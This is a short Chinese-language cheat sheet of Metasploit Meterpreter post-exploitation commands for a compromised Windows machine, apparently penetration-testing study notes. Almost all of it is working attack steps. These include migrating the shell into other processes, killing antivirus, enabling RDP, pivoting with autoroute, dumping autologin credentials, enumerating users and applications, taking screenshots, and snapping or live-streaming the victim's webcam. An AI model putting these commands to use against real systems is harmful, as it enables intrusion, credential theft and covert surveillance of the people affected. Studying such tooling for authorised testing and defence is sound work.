Post-exploitation attack
Information gathering
进程迁移
在获得Meterpreter Shell后,如何进行下一步
使用命令ps查看正在运行的进程
使用getpid查看Meterpreter Shell的进程号
进程迁移:之后使用migrate命令将Shell移动到其他进程里面,或者使用
1 | run post/windows/manage/migrate |
系统自动寻找合适的进程进行迁移
系统命令
sysinfo命令查看目标机的系统信息
使用命令
1 | run post/windows/gather/checkvm |
来查看目标机是否运行再虚拟机上
命令idletime查看目标机最近运行时间
命令route查看路由信息
命令getuid查看当前目标机器上已经渗透成功的用户名
命令
1 | run post/windows/manage/killav |
关闭目标机系统杀毒软件
命令
1 | run post/windows/manage/enable_rdp |
启用目标机的远程桌面协议 3389端口
命令
1 | run post/windows/manage/autoroute |
查看目标机本地子网情况
使用background将Meterpreter终端隐藏在后台,之后使用route add添加路由,可以使用route print查看
命令
1 | run post/windows/gather/enum_logged_on_users |
列举当前多少用户登陆了目标机
命令
1 | run post/windows/gather/enum_applications |
列举装在目标机上的应用
命令
1 | run windows/gather/credentials/windows_autologin |
可以抓取自动登录的用户名和密码
屏幕截图命令
1 | load espia |
or
1 | screenshot |
命令
1 | webcam_list |
查看有没有摄像头
命令
1 | webcam_snap |
拍摄
命令
1 | webcam_stream |
开启直播
命令
1 | shell |
进入目标机Shell
文件系统命令
1 | pwd # 目标机目录 |